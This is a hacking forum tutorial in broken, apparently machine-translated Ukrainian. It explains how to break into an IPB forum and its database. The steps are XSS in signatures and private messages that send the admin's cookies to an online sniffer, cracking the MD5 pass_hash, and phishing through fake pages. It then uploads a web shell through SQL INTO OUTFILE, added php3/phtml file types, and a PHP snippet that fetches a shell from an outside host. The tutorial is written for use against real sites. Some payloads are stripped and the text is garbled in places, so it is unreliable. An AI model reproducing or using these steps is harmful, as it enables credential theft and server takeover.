Злом базиданних через ipb форум з xss архів - софт портал ігор, хакі, проги, статті

Вообщем я знайшов спосіб злому сайту а там і бд, через форум ipb із застосуванням xss.

Що таке xss?
XSS (англ. Сross Site Sсriрting - «міжсайтовий скриптинг») - тип вразливості

інтерактивних інформаційних систем в інтернеті. XSS виникає, коли в генеруються сервером

сторінки з якоїсь причини потрапляють користувальницькі скрипти. Специфіка подібних атак

полягає в тому, що замість безпосередньої атаки сервера вони використовують вразливий

сервер в якості засобу атаки на клієнта.

Іноді для терміна використовують скорочення «CSS», але щоб не було плутанини з каскадними

таблицями стилів, використовують скорочення «XSS».

Зараз XSS складають близько 15% всіх виявлених вразливостей [1]. Довгий час

програмісти не приділяли їм належної уваги, вважаючи їх безпечними. Однак ця думка

помилково: на сторінці або в [Посилання можуть бачити тільки зареєстровані та активовані користувачі] можуть бути вельми вразливі дані (наприклад,

ідентифікатор сесії адміністратора). На популярному сайті скрипт може влаштувати

DoS-атакy.
Працює взде де мається тег acronym

Приклад популярних серверів: Asterios ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])

XSS працював би і на шоках але там надто длиние повідомлення заборонені (в підписі) а в

повідомлення відключені ці теги.

Для початку нам потрібно дізнатися чи включений на форумі метод TRACE якщо ж цей метод включений

то нам буде набагато легше отримати доступ в адмінку.

Для початку нам потрібно зареєструвати онлайн сніфер, я вибрав ось цей

OnLine sniffer || XakNet ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])


1) При наведення мишки на _______________. логи отправляються на сниффер.

] __________________________________________________ ____________________________
[/ Acronym]
2) Цей код автоматично (якщо навіть мишки не навели) відправляє лог на Снифф АЛЕ!

Працює тільки в Opera!
[/ Acronym]
] [/ Acronym]

вставляємо в код (який вище)

Тепер йдемо на форум який хочемо зламати і пішім нове повідомлення собі для перевірки

[Посилання можуть бачити тільки зареєстровані та активовані користувачі]

натискаємо відправити
Дивимося своє повідомлення у вхідних, там буде повідомлення виду '> але ми не звертаємо

увагу (якщо ви вставили другий код який вище то наведіть мишку на текст

__________________) і йдемо на наш сніфер OnLine sniffer || XakNet ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])
І дивимося логи
Якщо логів немає значить ви використовували не oper'y а ie (internet explorer, або firefox і

Якщо в логах є pass_hash значить trace включений.

[Посилання можуть бачити тільки зареєстровані та активовані користувачі]

Тоді ми робимо так:
1) Йдемо в профіль і натискаємо Змінити підпис
2) Вставляємо ваш код який ви тестували
3) Пишим в лс адміну сайту (Краще головному адміну) пишемо будь сообщеніе.Вніманіе! якщо

ви вставили код в підпис тоді вам не потрібно буде вставляти код в повідомлення тому пр

іпрочтеніе листи буде і відображатися ваша підпис! Якщо ж на форумі заборонені теги в

підписі тоді вставляємо код в повідомлення і відправляємо адміну. ​​(Перш ніж ставити в

підпис замасккіруйте щоб нічого не було видно в підписі про це дивіться далі)
4) Чекаємо коли адмін прочитає повідомлення і логи будуть у вашому сніфера.
5) Після отримання куків (логів) там буде рядок

pass_hash = c18c047c77589bрa989cc327509e7d5e;
18c047c77589bрa989cc327509e7d5e це і є наш пароль тільки зашифрований в md5, тепер

вам потрібно розшифрувати його прогой PasswordsPro або ж скористаємося онлайн сервісами

розшифровки.
c0llision - distributed lm / md5 / ntlm password recovering network ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])
Hashkiller - Index - MD5 cracken at hashkiller.com ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])

Після розшифровки вам буде вказано пас під яким ми будемо заходити в адмінку, де і

як залити шелл дивіться далі.

2.1) Так само є інший спосіб для крадіжки паролів фейком якщо метод TRACE вимкнений або ж

зоні .com зареєструвалися пошту можна на pochta.com)

1) Автоматичні відкриття фейк у фреймі (Працює тільки в опері!)
] [/ Acronym]


2) Відкриття фейк при наведення на текст ________. (Працює всюди)
__________________________________________________ _____________________] [/ acr

І так, відправляємо знову ж повідомлення самому собі (дивіться вище) з кодом який вище (з

1 або другим)
Читаємо своє повідомлення і упс вас перекинуло на фейк (Зверніть увагу на

(Не забудьте приховати його, як це зробити описано нижче) або краще в

підпис, і відправляємо адміну в лс. Так само можна написати на форумі повідомлення, так ви

зможете зібрати паролі не тільки адмінів.

І так ось наприклад адмін що щось запідозрив у вас в підписі і вирішив проверітьподпісь а

[Посилання можуть бачити тільки зареєстровані та активовані користувачі]

І отримуємо символи що то типу цього
# X68; # x74; # x74; # x70; # x3A; # x2F; # x2F; # x6C; # x32; # x66; # x61; # x6E; # x2D; # x64; # x6

А якщо адмін побачить ось це _________________________________. і йому здасться пов про

підозрілим, і знову подивиться в підпис і знову отримаєте банан, за що? за

post2
Там буде щось на зразок цього:
[Посилання можуть бачити тільки зареєстровані та активовані користувачі]
Це колір підпису, тобто ми будемо приховувати під колір.
наш код

Де # fff7ad наш колір
У підсумку ми максимально приховали наш код:

І так ось ми зайшли в адмінку і нам потрібно залити шелл є кілька способів щоб

Поддержка-> Управління SQL-> виконувати процеси-> Виконати новий запит

select 0x3c3f706870696e666f28293b3f3e into outfile

'Z: /home/site.ru/ [Посилання можуть бачити тільки зареєстровані та активовані користувачі]'

повний шлях можна подивитися так:

-> [Посилання можуть бачити тільки зареєстровані та активовані користувачі] Форум.ру /? Act = attachcode = attach_upload_remove

шелл: [Посилання можуть бачити тільки зареєстровані та активовані користувачі]

PS: Потрібні відповідні права

Форуми-> прикріплюються файли-> Типи файлів

тиснемо "Додати новий тип" -> "Використовувати який-небудь тип як базовий?" - вибираємо

"Заснований на типі php" -> "Розширення прикріплюватися файлу" - php3 (просто php є в

списку за замовчуванням і при завантаженні автоматично перейменовується в .txt) -> "MIME-тип

Тупотимо в свій профіль:

[Посилання можуть бачити тільки зареєстровані та активовані користувачі]

[Посилання можуть бачити тільки зареєстровані та активовані користувачі]

Попередньо беремо додаємо в типи файлів расшіфреніе .phtml і ставимо mime тип

фотографій.
Потім додаємо в профілях користувачів заливка расшіфреній .phtml і розмір будь-якої (чим

більше тим краще).
Потім спокійно заливаємо шелл і у властивостях дивимося шлях до шелла.
Причини чому шелл НЕ залився: Стоять права на папки avatars або html / emoticons, варто


Йдемо в "настройки" вибираємо будь-яку з них, тиснемо додати нову настройку, і в поле

"Виконання PHP-коду
до відображення або збереження настройки: "пишемо будь php код, наприклад такий:
-----------------------------------------

$ Linky = "[Посилання можуть бачити тільки зареєстровані та активовані користувачі] сайт_с_шеллом / shell.txt";
$ Saved = "/ home // [Посилання можуть бачити тільки зареєстровані та активовані користувачі]";
$ From = fopen ( "$ linky", "r");
$ To = fopen ( "$ saved", "w");
while (! feof ($ from))<
$ String = fgets ($ from, 4096);
fputs ($ to, $ string);
>
fclose ($ to);
echo 'done';
fclose ($ from);

Веб шелл знайдете самі) google.com вам на допомогу особисто я юзаю
Dump.Ru - обмін файлами, безкоштовний файловий хостинг, реєстрація не є обов'язковою умовою ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])
або
AK-74 Security Team Web Shell ([Посилання можуть бачити тільки зареєстровані та активовані користувачі])

Після того як ви залили шелл йдете в самий корінь де зро перебувати сайт і шукаєте конфиг де настройки підключення до бд.
На asterios xss працює тільки в повідомлення при відповіді він побачить ваш xss так що краще не ризикуйте)

Це колір підпису, тобто ми будемо приховувати під колір.
код:
наш код
на [* color = "# fff7ad"] наш код [/ color *] і поясніть що без *

Додано через 37 хвилин
Щоб не мучитися з TRACE використовуйте утиліту [Посилання можуть бачити тільки зареєстровані та активовані користувачі]
Вона вам покаже включений чи trace чи ні